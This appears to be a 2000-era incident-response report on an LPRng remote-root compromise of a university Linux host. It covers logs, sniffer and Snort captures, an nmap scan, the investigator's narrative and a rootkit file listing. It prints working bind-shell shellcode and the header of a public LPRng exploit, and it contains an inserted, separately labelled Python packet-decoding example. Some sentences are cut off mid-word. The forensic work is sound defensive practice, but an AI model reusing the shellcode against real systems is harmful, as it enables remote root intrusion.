          å1Ò²f   Ð1É     ËC      ]øC     ]ôK        Mü^MMôÍ^@1É     EôCf    ]ìfÇEî^O'
           Mð^MEì  EøÆEü^P Ð^MMôÍ^@        ÐCCÍ^@  ÐCÍ^@   Ã1ɲ?   ÐÍ^@    ÐAÍ^@ë^X^  
         u^H1F^G E^L°^K  ó^MM^H^MU^LÍ^@èãÿÿÿ/bin/sh'
     3. Nov 25 14:46:14 Victim#1 kernel: lpsched uses obsolete (PF_INET,SOCK_PACKET)
     4. Nov 25 14:46:14 Victim#1 kernel: eth0: Setting promiscuous mode.
     5. Nov 25 14:46:14 Victim#1 kernel: device eth0 entered promiscuous mode
     6. Nov 25 14:50:00 Victim#1 CROND[2725]: (root) CMD (   /sbin/rmmod -as) 
     7. Nov 25 15:00:00 Victim#1 CROND[2737]: (root) CMD (   /sbin/rmmod -as) 
     8. Nov 25 15:01:00 Victim#1 CROND[2740]: (root) CMD (run-parts /etc/cron.hourly) 
     9. Nov 25 15:03:48 Victim#1 PAM_unix[2747]: authentication failure; (uid=0) -> root for system-auth service


    Line 1. This is the first entry of the buffer overflow attack.
    Even though I do not have the tcpdump of this attack, I can translate the characters to hex and confirm the exploit used was almost identical (if not the same) as the one posted on SANS GIAC Jan 22, 2001 by Chris Talianekte. 

    The source code which I believe executed this attack includes identical hex code including the 0x0f27 which Chris suggests might be a clue to the odd alternating port connections during the buffer overflow.  I am not a C programmer, however the source code does specifically refer to ports htons(515) and htons(3879).

    char shellcode[] =

      "\x31\xdb\x31\xc9\x31\xc0\xb0\x46\xcd\x80"
      "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
      "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
      "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
      "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
      "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
      "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
      "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
      "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
     

    Again, the times recorded in this messages logfile were from Victim#1. The time difference in the various machines makes it difficult to synchronize the logfiles between machines.

    There were 682 entries between 14:39:09 and 14:42:55 in the /var/log/messages file similar to this entry.
    There was one final entry at 15:04:47.

    Line 3-5. These entries were made by the application lpsched.
    Line 9. At 15:03, it appears the suspect had an authentication error. This is the same time there is the telnet connect from Victim#2.  There is one more entry similar to the previous buffer overflows at 15:04:47, but it is an isolated connect. Perhaps the suspect had a few problems and this last attempt corrected them.
     

    /var/log/secure

     1. Nov 25 13:54:04 Victim#1 xinetd[470]: START: telnet pid=1594 from=205.177.91.2
     2. Nov 25 13:54:09 Victim#1 login: FAILED LOGIN SESSION FROM x-press.net FOR (null), Error in service module
     3. Nov 25 14:38:41 Victim#1 xinetd[470]: START: telnet pid=1614 from=210.94.114.48
     4. Nov 25 15:03:43 Victim#1 xinetd[470]: START: telnet pid=2746 from=X.X.167.56



    Line 1,2. The original scan connection which occurred during the full network scan from BadGuyIP#1.
    Line 3. This is the telnet connection which immediately preceded the attack.
    Observation:
    The time shown here is the time on Victim#1; the firewall log time is the time on the firewall.
    This connection lets us determine the timing difference.
    For a complete understanding of the attack, time differences are critical.
    Line 4. This is interesting! We have an incoming telnet connection from Victim#2 TO Victim#1.
    This connection is also recorded on both victim machines, in the BadGuy's sniffer file on Victim#2.
    It is not recorded in Victim#1's sniffer file.
    Victim#2 - Beginning of captured sniffer file.
    ============================================
    Time: Sat Nov 25 14:59:37     Size: 256
    Path: X.X.167.56 => ftp.UU.NET [21]
    --------------------------------------------
    <I clipped this>
    ============================================
    Time: Sat Nov 25 15:01:18     Size: 256
    Path: X.X.167.56 => X.X.8.60 [23]
    --------------------------------------------
    44
    e4
    e !"'#8
    e8
    e9
    e:
    eE
    e
    er
    e>
    eootA
    e

    Victim#1 - Beginning of captured sniffer file
    =======================================
    Time: Sat Nov 25 14:59:46     Size: 4
    Path: X.X.8.115 => X.X.MailServer [110]
    ---------------------------------------

    ========================================
    Time: Sat Nov 25 15:03:43     Size: 256
    Path: X.X.167.56 => X.X.8.60 [23]
    ----------------------------------------
    44
    e4
    e !"'#8
    e8
    e9
    e:
    eE
    e
    er
    e>
    eootA
    e

    /var/log/maillog

    Victim#1

    Nov 25 14:46:15 victim1 sendmail[2717]: NOQUEUE: SYSERR(root): /etc/sendmail.cf: line 108: readcf: map arith: class arith not available
    Nov 25 14:46:15 victim1 sendmail[2717]: NOQUEUE: SYSERR(root): /etc/sendmail.cf: line 249: DaemonPortOptions parameter "Name=MTA" unknown
    Nov 25 14:46:15 victim1 sendmail[2717]: NOQUEUE: SYSERR(root): /etc/sendmail.cf: line 250: DaemonPortOptions parameter "Name=MSA" unknown
    Nov 25 14:46:15 victim1 sendmail[2717]: NOQUEUE: SYSERR(root): /etc/sendmail.cf: line 250: DaemonPortOptions parameter "M=E" unknown
    Nov 25 14:46:15 victim1 sendmail[2717]: NOQUEUE: SYSERR(root): Warning: .cf version level (9) exceeds sendmail version 8.9.3 functionality (8): Socket operation on non-socket

    Victim#2

    Nov 25 14:53:03 victim2 sendmail[4611]: NOQUEUE: SYSERR(root): /etc/sendmail.cf: line 108: readcf: map arith: class arith not available
    Nov 25 14:53:03 victim2 sendmail[4611]: NOQUEUE: SYSERR(root): /etc/sendmail.cf: line 249: DaemonPortOptions parameter "Name=MTA" unknown
    Nov 25 14:53:03 victim2 sendmail[4611]: NOQUEUE: SYSERR(root): /etc/sendmail.cf: line 250: DaemonPortOptions parameter "Name=MSA" unknown
    Nov 25 14:53:03 victim2 sendmail[4611]: NOQUEUE: SYSERR(root): /etc/sendmail.cf: line 250: DaemonPortOptions parameter "M=E" unknown
    Nov 25 14:53:03 victim2 sendmail[4611]: NOQUEUE: SYSERR(root): Warning: .cf version level (9) exceeds sendmail version 8.9.3 functionality (8): Socket operation on non-socket

    The Exploit
    I believe the attacker exploited the vulnerability in LPRng, however I'm still unclear about what part the connections to port 3879 had in the exploit.  I've downloaded several different exploit codes for LPRng and have not been able to reprod
    LPRng - The full code is available on BugTraq.

    /*
     *  Copyright (c) 2000 - Security.is
     *
     *  The following material may be freely redistributed, provided
     *  that the code or the disclaimer have not been partly removed,
     *  altered or modified in any way. The material is the property
     *  of security.is. You are allowed to adopt the represented code
     *  in your programs, given that you give credits where it's due.
     *
     * security.is presents: LPRng/Linux remote root lpd exploit.
     *
     * Author: DiGiT - teddi@linux.is
     *
     * Thanks to: portal for elite formatstring talent ;>

    The Discovery/Compromise

    After compromise: 

    [Snort Alert log]
    Nov 25 17:16:46 felix snort[13246]: IDS246 - MISC - Large ICMP Packet: X.X.8.60 -> 18.242.162.210
    Nov 26 11:12:27 felix snort[13246]: IDS246 - MISC - Large ICMP Packet: X.X.8.60 -> 18.242.162.210
    Nov 27 14:16:09 felix snort[13246]: IDS246 - MISC - Large ICMP Packet: X.X.8.60 -> 18.242.162.210
    Nov 28 08:13:51 felix snort[13246]: IDS246 - MISC - Large ICMP Packet: X.X.8.60 -> 18.242.162.210
    Nov 28 17:11:42 felix snort[13246]: IDS246 - MISC - Large ICMP Packet: X.X.8.60 -> 18.242.162.210
    Nov 28 17:15:46 felix snort[13246]: IDS246 - MISC - Large ICMP Packet: X.X.8.60 -> 18.242.162.210
    Nov 29 10:28:44 felix snort[13246]: IDS246 - MISC - Large ICMP Packet: X.X.8.60 -> 18.242.162.210
    Nov 29 10:30:47 felix snort[13246]: IDS246 - MISC - Large ICMP Packet: X.X.8.60 -> 18.242.162.210
    Nov 29 10:47:02 felix snort[13246]: IDS246 - MISC - Large ICMP Packet: X.X.8.60 -> 18.242.162.210
    Nov 29 10:53:09 felix snort[13246]: IDS246 - MISC - Large ICMP Packet: X.X.8.60 -> 18.242.162.210

    [TCPdump of the above ICMP packets]
    10:47:02.766849 0:0:ef:3:4d:60 0:0:ef:3:80:f0 0800 1058: X.X.8.60 > 18.242.162.210: icmp: echo reply
    0x0000   4500 0414 b20e 0000 3f01 70de 5858 083c        E.......?.p....<
    0x0010   12f2 a2d2 0000 9ca3 1a0a 0000 0000 0000        ................
    0x0020   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0030   736b 696c 6c7a 0000 0000 0000 0000 0000        skillz..........
    0x0040   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0050   0000 0000 0000 0000 0000 0000 0000 0000        ................
    <clipped>
    10:53:08.755452 0:0:ef:3:4d:60 0:0:ef:3:80:f0 0800 1058: X.X2.8.60 > 18.242.162.210: icmp: echo reply
    0x0000   4500 0414 b225 0000 3f01 70c7 5858 083c        E....%..?.p....<
    0x0010   12f2 a2d2 0000 9ca3 1a0a 0000 0000 0000        ................
    0x0020   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0030   736b 696c 6c7a 0000 0000 0000 0000 0000        skillz..........
    0x0040   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0050   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0060   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0070   0000 0000 0000 0000 0000 0000 0000 0000        ................
    0x0080   0000 0000 0000 0000 0000 0000 0000 0000        ................
    <clipped>
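    The dump above can be decoded mechanically. The following is an added example (not part of the original report) that re-reads the six hex lines printed for the 10:47:02 packet, pulls out the IP and ICMP header fields, and states why a defender would flag it: the IP header says the datagram is 1044 bytes (the dump is clipped, so only 96 bytes are available), the ICMP type is 0 (echo reply), and the payload carries the string "skillz" at offset 0x30. The 800-byte "large ICMP" threshold and the request/reply bookkeeping in unsolicited_replies() are choices made for this example; note also that the report's anonymised source address was written into the hex as 5858 ("XX"), so it decodes as 88.88.8.60.

```python
"""Decode a tcpdump hex dump of an ICMP datagram and explain why it was flagged.

Added example, not code from the original report. The size threshold and the
unsolicited-reply check are assumptions made here.
"""
import struct
from typing import Dict, List, Tuple

# Copied from the capture in the report. The dump is clipped on the page, so only
# the first 96 bytes of the 1044-byte datagram are available.
PAGE_HEXDUMP = """\
0x0000   4500 0414 b20e 0000 3f01 70de 5858 083c        E.......?.p....<
0x0010   12f2 a2d2 0000 9ca3 1a0a 0000 0000 0000        ................
0x0020   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x0030   736b 696c 6c7a 0000 0000 0000 0000 0000        skillz..........
0x0040   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x0050   0000 0000 0000 0000 0000 0000 0000 0000        ................
"""

LARGE_ICMP_BYTES = 800          # assumed threshold; an ordinary ping is well under 100 bytes
KNOWN_MARKERS = (b"skillz",)    # the string visible at offset 0x30 in the page's dump


def hexdump_to_bytes(dump: str) -> bytes:
    """Turn 'tcpdump -x' style lines (offset, hex words, ascii gutter) into raw bytes."""
    out = bytearray()
    for line in dump.splitlines():
        fields = line.split()
        if not fields or not fields[0].startswith("0x"):
            continue
        for word in fields[1:]:
            # hex words are exactly four hex digits; the ascii gutter is not
            if len(word) != 4 or any(c not in "0123456789abcdef" for c in word):
                break
            out.extend(bytes.fromhex(word))
    return bytes(out)


def decode_ip_icmp(pkt: bytes) -> Dict[str, object]:
    """Parse the IPv4 header and, for protocol 1, the 8-byte ICMP header."""
    ihl = (pkt[0] & 0x0F) * 4
    total_len, _ident, _frag, ttl, proto = struct.unpack("!HHHBB", pkt[2:10])
    info: Dict[str, object] = {
        "total_length": total_len,
        "ttl": ttl,
        "protocol": proto,
        "src": ".".join(str(b) for b in pkt[12:16]),
        "dst": ".".join(str(b) for b in pkt[16:20]),
    }
    if proto == 1:
        icmp_type, code, _csum, icmp_id, seq = struct.unpack("!BBHHH", pkt[ihl:ihl + 8])
        info.update(icmp_type=icmp_type, icmp_code=code, icmp_id=icmp_id,
                    icmp_seq=seq, payload=pkt[ihl + 8:])
    return info


def suspicious_reasons(info: Dict[str, object]) -> List[str]:
    """Human-readable reasons this ICMP datagram deserves a second look."""
    reasons: List[str] = []
    if info.get("protocol") != 1:
        return reasons
    if int(info["total_length"]) >= LARGE_ICMP_BYTES:
        reasons.append(f"large ICMP datagram: {info['total_length']} bytes")
    payload = bytes(info.get("payload", b""))
    for marker in KNOWN_MARKERS:
        if marker in payload:
            reasons.append(f"marker {marker!r} at payload offset {payload.index(marker)}")
    return reasons


def unsolicited_replies(events: List[Tuple[str, str, int, int, int]]) -> List[Tuple[str, str, int, int]]:
    """events: (src, dst, icmp_type, id, seq) in capture order.

    An echo reply (type 0) is legitimate only if an echo request (type 8) with the
    same id/seq went the other way earlier. Anything else is data leaving the host
    dressed up as a reply, which is what the firewall logs showed for Victim#1.
    """
    seen_requests = set()
    unsolicited = []
    for src, dst, icmp_type, ident, seq in events:
        if icmp_type == 8:
            seen_requests.add((dst, src, ident, seq))   # the reply will come back dst -> src
        elif icmp_type == 0 and (src, dst, ident, seq) not in seen_requests:
            unsolicited.append((src, dst, ident, seq))
    return unsolicited


def analyse_page_packet() -> Tuple[Dict[str, object], List[str]]:
    info = decode_ip_icmp(hexdump_to_bytes(PAGE_HEXDUMP))
    return info, suspicious_reasons(info)


if __name__ == "__main__":
    info, reasons = analyse_page_packet()
    print(f"{info['src']} -> {info['dst']} icmp type {info['icmp_type']}: {'; '.join(reasons)}")
```

    Run stand-alone it prints the decoded endpoints and both reasons. The marker check is the cheap part; the unsolicited-reply check is what turns "large ICMP" into a real finding, because a host that only ever answers pings never originates a reply on its own.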


    Monday, Nov 27, 2000 (9:30am) : I noticed a few scans in the weekend logfiles. The scans originated outside of our network.  Scans are common in our environment (dot.edu).  Normally I check a few other logs for signs of intrusion and if I find nothing, I simply make a few notes of the event.  However my antennae were active and I had an odd feeling about these scans.  With no evidence at hand, I decided to send an email message to several of our System Administrators and to the Managers of various System Administrators on our campus. In this message I mentioned the scans and reminded them of the increased dangers during the Christmas season and encouraged them to take extra time to secure their servers.

    Wednesday, Nov 29, 2000 (5pm): An employee casually stops at my office door on his way out and asks if I know "any reason why 'ls' would stop working". 

    Anyone reading this now will immediately recognize the clue.  But I've seen new unix administrators do some pretty weird things to their machines.  I kept the idea of a rootkit in the back of my mind while I asked more questions.
     

    Q: "What do you mean stopped working?"
    A:  "If I'm logged in as a normal user, ls only returns a prompt.  But if I'm root, I get the directory listing."
    Q: "Are you listing the same directory from each login?"
    A: "Yes."
    Q: "Are you sure?" (it's amazing how many people get stumped with this question.)
    A: "Uh.. yeah, I'm pretty sure... well, I think I did."
    Q: "Have you made any system changes lately?"
    A: "Oh yeah!  I've installed all kinds of stuff over the last couple of days."
    Q: "When is the last time 'ls' worked?"
    A: "I don't remember."
    Q: "Has 'ls' *ever* worked?"
    A: "Yes."
    Q: "What operating system are you using?"
    A: "RH 7, I just installed it a few weeks ago."
    Q: "Do you normally do your work as root?"
    A: "Yes, pretty much."
    Q: "But you are SURE 'ls' was working from a non-privileged account?"
    A: "Yes, I'm positive."
    Now I've heard enough to make me curious. I ask him to show me what's happening.  We walk to his office and he logs into his console with his non-privileged account.  At the system prompt, he executes 'ls'.  The system prompt returned, just as he had said.  There was no listing.
    Me: "Do a 'pwd'"
    He is in his home directory
    Me: "Execute 'ls -al'"
    Again, the prompt returns promptly.
    He su's to root and executes 'ls' again.  This time there are files listed.
    Me: "Do a 'pwd'"
    He is in the same directory as before.
    Me: "Execute 'ls -al'"
    A full listing returns.
    I verify the permissions are set correctly on . and ..
    Me: "Go back to the non-privileged account."
    He returns to his normal user login
    Me: "Type 'which ls'"
    /bin/ls returns.
    Me: "Type 'stat *'"
    We get the full status information on all the files in his directory.  This means his account does not have a problem reading the directory information.
    Now he tries to 'ls' other directories, all result in the same return... nothing.

    About this time a Sr Unix Administrator walks by.  I seize the opportunity and seek his insight.  He followed the same path I had.  Same questions, same commands.  He also checked the /dev/<filesystem> permissions and kmem permissions.  These last items were not really expected to produce answers.  We were now looking for correlation.

    The Sr Admin sat at the keyboard.  The "new" Admin watched with bated breath, another unix/programmer had joined us.  I was almost at peace with letting the Sr. Admin solve the mystery when I heard it. Five words spoken softly, almost as if they were still in thought... "PS does the same thing." 

    There was a low hum as the gasps filled the air.  I hear my name "Maarreeee".  Then in almost a whisper the programmer brings me back to reality as he declared aloud what was now almost certain, "Rootkit!".

    The Sr. Admin and the programmer return to their offices.  The new (now most surely VICTIM) admin gave me the root password to his machine, expressed regrets (he really did want to stick around for the show, but had other commitments), and went home.

    I logged into the console with the root account.  Even though we have strong indication the system has been compromised, there has been no proof.  It is getting late and I've been doing this too long to want to stay up all night working on this.  My objective for the night is to find evidence the system has been compromised and remove any threat or danger the machine or our network may currently be in (in other words, verify the hack and quarantine the machine).

    At this time, I am still using commands which are on the suspect-machine.  I know this is not the preferred method, but I wanted solid proof before I spent too much time working on this.

    My first thought is to capture network traffic going to or from the victim machine.

    I asked the Sr. Admin if he had any servers on the same segment of our network as the Victim machine.  He had several unix servers running on that segment.
    I asked if he had tcpdump installed on any of these servers.  He did not have it installed but  offered to install it.

    While he was installing tcpdump, I looked through the system's logfiles in /var/log.  As I expected, the syslog.conf was running with 'default' settings.  This means it will have very little logging.  By viewing the /etc/syslog.conf file I can tell which files might possibly have logged interesting events.  This information gets me started.

    Console#>  cd /var/log
    Console# > ls -alt|more
    The command 'ls -alt' sorts the files by time modified with the most recently modified first.
    Console#> more /var/log/secure
    This is where I noticed an unusual telnet connection from another machine on our campus.  Still, this is not evidence of an attack or an intrusion, but I do make note of the date and time the connection occurred.
    Console#> more /var/log/messages
    Nothing unusual here.  I notice the log was rotated on Nov 26 via cron.  I remember the telnet connection from the /var/log/secure file which occurred on Nov 25.  I decide to check the previous message log file.
    Console#> more /var/log/messages.1
    BINGO!  That didn't take long.  After reading 1488 boring lines I found an entry where someone was attempting to exploit a buffer overflow.  Now I have proof that someone TRIED to break into the machine.  I still do not have proof they succeeded.  I continued paging through the messages.1 file.  There was line after line of the attempt. There were 811 lines in the logfile of the buffer overflow code.  It seemed like forever before I reached the end of it.  Finally, at the end of the buffer overflow entries was a log message indicating the ethernet interface was entering promiscuous mode.

    I checked the ifconfig -a output and verified that promiscuous mode was currently enabled.
    I verified via an uncompromised Redhat 7 machine, that promiscuous mode is not enabled by default.

    From another machine, I scanned Victim#1 with nmap.
     

    (The 65517 ports scanned but not shown below are in state: closed)
    Port       State       Service
    22/tcp     open        ssh
    23/tcp     open        telnet
    25/tcp     open        smtp
    79/tcp     open        finger
    80/tcp     open        http
    111/tcp    open        sunrpc 
    113/tcp    open        ident
    513/tcp    open        login
    514/tcp    open        shell
    515/tcp    open        printer
    587/tcp    open        submission
    1025/tcp   open        blackjack
    3306/tcp   open        mysql
    3879/tcp   open        unknown
    7786/tcp   open        minivend
    8080/tcp   open        http-alt
    8765/tcp   open        ultraseek-http
    15000/tcp  open        unknown
    Port 15000 grabbed my attention.  I telnetted to the port (telnet victim1.edu 15000) and received an ssh banner.

    I suspect a backdoor sshd has been installed, however I cannot verify this until I talk to the system owner (he's been known to do unusual things while testing applications).
    A hindsight note: As I am writing this, I notice that port 3879 is open... hmmm.

    Now it is decision time.  Do we unplug the machine from the network, or ride along for a while?  Normally I would have installed tcpdump on a neighboring machine to see what might be happening, but the Sr. Admin had not yet been able to install tcpdump. It was almost 7pm and my dinner was getting cold.

    I decided to unplug the machine from the network and go home.  Before leaving the office, I blocked all access to and from the machine at the firewall. This was done to prevent the machine from being accidentally plugged back into the network.

    I spent the evening thinking about how to proceed the following day.  One item which bothered me was the telnet connection to the victim machine from one of our machines.  There was a possibility other machines were compromised also.

    DAY 2:
    I logged into the server which keeps my firewall logs.  I grep'ed Nov 25's logfile for the IP Address of the machine which had established the telnet connection to victim#1.
    There was suspicious traffic which could indicate a compromise.  I grep'ed the IP Address of victim#1 from the same logfile and discovered the patterns were identical.
    I made a few phone calls in an attempt to locate the owner of the second machine.  I would have to wait until later in the day for contact information in order to verify the compromise.

    I made a list of the files I would need to review the damage on the machine (ls, find, ps, lsof, etc) and copied them from another linux server via floppy disk (remember, the machine is still unplugged from the network).

    I logged into the console and created a directory to copy my good files into.  The login process took much longer than normal and triggered my suspicions.

    Console#> /gooddir/ls -al /sbin/login
     -rwx------   root /lp           4276 Nov 25 14:53 /sbin/login


    I know login is not normally located in sbin, and I don't have any idea why I looked there, but what a way to get started! 
    Clue #1, group owner is lp. Also the size seems a little small, and there is the date issue.  But the group ownership is what I focused on.
    I executed a find command to locate all files which were group owned by lp. 

    Console#> /gooddir/find / -group lp -ls

    47710210    0 dr-xr-xr-x   3 lp/lp             0 Dec  1 13:13 /proc/728
    836755    4 -rw-r--r--   1 lp/lp               4 Nov 28 16:57 /var/run/lpd.printer
    557716    4 drwx------   2 lp/lp            4096 Nov 17 14:16 /var/spool/lpd/lp
    557719    4 -rw-------   1 lp/lp             192 Nov 17 13:59 /var/spool/lpd/lp/general.cfg
    557725    4 -rw-------   1 lp/lp             347 Nov 17 13:59 /var/spool/lpd/lp/postscript.cfg
    557727    4 -rw-------   1 lp/lp             146 Nov 17 13:59 /var/spool/lpd/lp/textonly.cfg
    557728    0 -rw-------   1 lp/lp               0 Nov 17 13:56 /var/spool/lpd/lp/control.hp1200cn
    557731    8 -rw-------   1 lp/lp            6798 Nov 17 14:16 /var/spool/lpd/lp/status.hp1200cn
    557732    0 -rw-------   1 lp/lp               0 Nov 17 13:56 /var/spool/lpd/lp/status
    557733    0 -rw-------   1 lp/lp               0 Nov 17 13:56 /var/spool/lpd/lp/log
    557734    4 -rw-------   1 lp/lp             680 Nov 17 14:16 /var/spool/lpd/lp/acct
    557737    0 -rw-------   1 lp/lp               0 Nov 17 14:16 /var/spool/lpd/lp/hp1200cn
    557738    4 -rw-------   1 lp/lp               5 Nov 17 14:16 /var/spool/lpd/lp/unspooler.hp1200cn
    983152    4 drwx------   2 lp/lp            4096 Nov 17 14:04 /var/spool/lpd/lp0
    983154    4 -rw-------   1 lp/lp             192 Nov 17 14:04 /var/spool/lpd/lp0/general.cfg
    983155    4 -rw-------   1 lp/lp             342 Nov 17 14:04 /var/spool/lpd/lp0/postscript.cfg
    983156    4 -rw-------   1 lp/lp             146 Nov 17 14:04 /var/spool/lpd/lp0/textonly.cfg
    983157    0 -rw-------   1 lp/lp               0 Nov 17 14:00 /var/spool/lpd/lp0/control.hp4mv
    983158    4 -rw-------   1 lp/lp            2069 Nov 17 14:00 /var/spool/lpd/lp0/status.hp4mv
    983159    0 -rw-------   1 lp/lp               0 Nov 17 14:00 /var/spool/lpd/lp0/status
    983160    0 -rw-------   1 lp/lp               0 Nov 17 14:00 /var/spool/lpd/lp0/log
    983161    4 -rw-------   1 lp/lp             450 Nov 17 14:04 /var/spool/lpd/lp0/acct
    983164    0 -rw-------   1 lp/lp               0 Nov 17 14:00 /var/spool/lpd/lp0/hp4mv
    983165    4 -rw-------   1 lp/lp               5 Nov 17 14:00 /var/spool/lpd/lp0/unspooler.hp4mv
    983162    0 -rw-------   1 lp/lp               0 Nov 17 14:04 /var/spool/lpd/lp0/control.hplj4000
    983163    4 -rw-------   1 lp/lp            2093 Nov 17 14:04 /var/spool/lpd/lp0/status.hplj4000
    983168    0 -rw-------   1 lp/lp               0 Nov 17 14:04 /var/spool/lpd/lp0/hplj4000
    197622    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/lp0
    197623    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/lp1
    197624    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/lp2
     16740    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp0
     16741    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp1
     16742    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp10
     16743    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp11
     16744    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp12
     16745    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp13
     16746    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp14
     16747    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp15
     16748    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp2
     16749    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp3
     16750    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp4
     16751    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp5
     16752    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp6
     16753    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp7
     16754    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp8
     16755    0 crw-rw----   1 root/lp           Aug 24 04:00 /dev/usb/lp9
    202991    0 -rw-------   1 root/lp         0 Nov 25 14:53 /dev/dos
     16527    8 -rwx------   1 root/lp      5228 Nov 25 14:53 /etc/rc.d/init.d/network
    214154    4 -rw-------   1 root/lp        14 Nov 25 14:53 /etc/ld.so.hash
    311861   20 -rwx------   1 root/lp     19464 Nov 25 14:53 /bin/xlogin
     33432    4 drwx------   5 root/lp      4096 Dec  1 13:08 /lib/security/.config
     33433    4 drwx------   2 root/lp     4096 Nov 25 14:53 /lib/security/.config/backup
     33445   20 -rwx------   1 root/lp     19464 Nov 25 14:53 /lib/security/.config/backup/login
     33447    8 -rwx------   1 root/lp      5228 Nov 25 14:53 /lib/security/.config/backup/network
     33448   40 -rwx------   1 root/lp     37884 Nov 25 14:53 /lib/security/.config/backup/in.telnetd
     33434    4 drwx------   2 root/lp      4096 Nov 25 14:53 /lib/security/.config/bin
     33436   16 -rws------   1 root/lp     14184 Nov 25 14:53 /lib/security/.config/bin/su
     33437   24 -rws------   1 root/lp     20604 Nov 25 14:53 /lib/security/.config/bin/ping
     33438   28 -rwx------   1 root/lp     25116 Nov 25 14:53 /lib/security/.config/bin/du
     33439   16 -r-s------   1 root/lp     13536 Nov 25 14:53 /lib/security/.config/bin/passwd
     33440   80 -rwx------   1 root/lp     74236 Nov 25 14:53 /lib/security/.config/bin/find
     33441   44 -rwx------   1 root/lp     43740 Nov 25 14:53 /lib/security/.config/bin/ls
     33442   84 -rwx------   1 root/lp     78012 Nov 25 14:53 /lib/security/.config/bin/netstat
     33443   88 -rwx------   1 root/lp     83868 Nov 25 14:53 /lib/security/.config/bin/lsof
     33444   68 -r-x------   1 root/lp     65148 Nov 25 14:53 /lib/security/.config/bin/psr
     33435    4 -rw-------   1 root/lp       652 Nov 25 14:53 /lib/security/.config/uconf.inv
     33446  208 -rwx------   1 root/lp    205288 Nov 25 14:53 /lib/security/.config/sshd
    902260    4 drwx------   2 root/lp      4096 Nov 25 14:53 /lib/security/.config/ssh
    902274    4 -rw-------   1 root/lp       525 Nov 25 14:53 /lib/security/.config/ssh/ssh_host_key
    902276    4 -rw-------   1 root/lp       329 Nov 25 14:53 /lib/security/.config/ssh/ssh_host_key.pub
    902277    4 -rw-------   1 root/lp       512 Nov 28 16:57 /lib/security/.config/ssh/ssh_random_seed
    902278    4 -rw-------   1 root/lp       461 Nov 25 14:53 /lib/security/.config/ssh/sshd_config
     33449    8 -rwx------   1 root/lp      5064 Nov 25 14:53 /lib/security/.config/ava
     33450    4 -rwx------   1 root/lp      4032 Nov 25 14:53 /lib/security/.config/cleaner
     33451    4 -rwx------   1 root/lp      1596 Nov 25 14:53 /lib/security/.config/sz
     33452    4 -rwx------   1 root/lp       960 Nov 25 14:53 /lib/security/.config/patcher
     33453   12 -rwx------   1 root/lp     11970 Nov 25 14:53 /lib/security/.config/pg
     33454    4 -rwx------   1 root/lp      3648 Nov 25 14:53 /lib/security/.config/crypt
     33455    4 -rwx------   1 root/lp      3052 Nov 25 14:53 /lib/security/.config/utime
     33456    8 -rwx------   1 root/lp      7028 Nov 25 14:53 /lib/security/.config/lpsched
     33457   20 -rw-------   1 root/lp     19442 Nov 30 15:18 /lib/security/.config/mfs
    557659    8 -rwx------   1 root/lp      4276 Nov 25 14:53 /sbin/login
    688864  424 -rwxr-xr-x   1 lp/lp      429984 Aug 14 14:23 /usr/bin/lpq
    688865  436 -rwxr-xr-x   1 lp/lp      439872 Aug 14 14:23 /usr/bin/lpr
    688866  424 -rwxr-xr-x   1 lp/lp      426720 Aug 14 14:23 /usr/bin/lprm
    688867  428 -rwxr-xr-x   1 lp/lp      433792 Aug 14 14:23 /usr/bin/lpstat
    689619  208 -rwxr-xr-x   1 root/lp    205288 Nov 25 14:53 /usr/bin/ssh2d
    770760   96 -rwx------   1 root/lp     93924 Nov 25 14:53 /usr/lib/lpq
    770761    8 -r--------   1 root/lp      5500 Nov 25 14:53 /usr/lib/crth.o
    328124  428 -rwxr-xr-x   1 lp/lp      431584 Aug 14 14:23 /usr/sbin/lpc

    There are two ways to identify the rootkit files from the above output.  First, they are all dated Nov 25, 14:53 (Note: The listing used here was created for this report after the initial investigation was complete. The rootkit directory may have been modified during my investigation), which reflect Second, they are owner root, group lp. It is important to notice that there are also some legitimate files which are root/lp. These can be distinguished by their dates, however I did compare each file with an existing (uncompromised) Redhat 7 server.

    Using the above criteria, the list of files is narrowed down to the following:

    202991    0 -rw-------   1 root/lp         0 Nov 25 14:53 /dev/dos
     16527    8 -rwx------   1 root/lp      5228 Nov 25 14:53 /etc/rc.d/init.d/network
    214154    4 -rw-------   1 root/lp        14 Nov 25 14:53 /etc/ld.so.hash
